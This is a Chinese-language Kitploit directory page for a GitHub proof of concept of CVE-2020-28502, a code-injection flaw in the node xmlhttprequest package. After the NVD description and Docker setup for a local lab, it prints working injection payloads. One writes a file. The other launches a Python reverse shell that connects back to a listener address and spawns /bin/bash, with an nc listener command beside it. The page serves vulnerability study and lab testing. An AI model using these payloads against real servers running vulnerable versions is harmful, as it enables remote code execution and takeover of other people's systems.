Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
工具/GitHubGitHub/s-index/cve-2020-28502
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具Payload 开发
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

查看仓库
32505年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-28502 node-XMLHttpRequest RCE

NVD 描述

这影响包 xmlhttprequest 1.7.0 之前的所有版本;以及包 xmlhttprequest-ssl 的所有版本。当请求同步发送时(即 xhr.open 中的 async=False),恶意用户输入流入 xhr.send 可能导致任意代码被注入并执行。

演示

cve-2020-28502

设置

  1. 从 Dockerfile 构建镜像
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. 在新容器中运行 node app.js
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. 访问 http://localhost:3000

localhost-image

PoC 有效载荷

添加文件

提交有效载荷

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

反向 Shell

  1. 监听客户端
root@kitploit:~
$ nc -l 8888
  1. 提交有效载荷

将 IP 地址 (192.168.0.25) 更改为您的本地 IP 地址

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

参考

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935
下载工具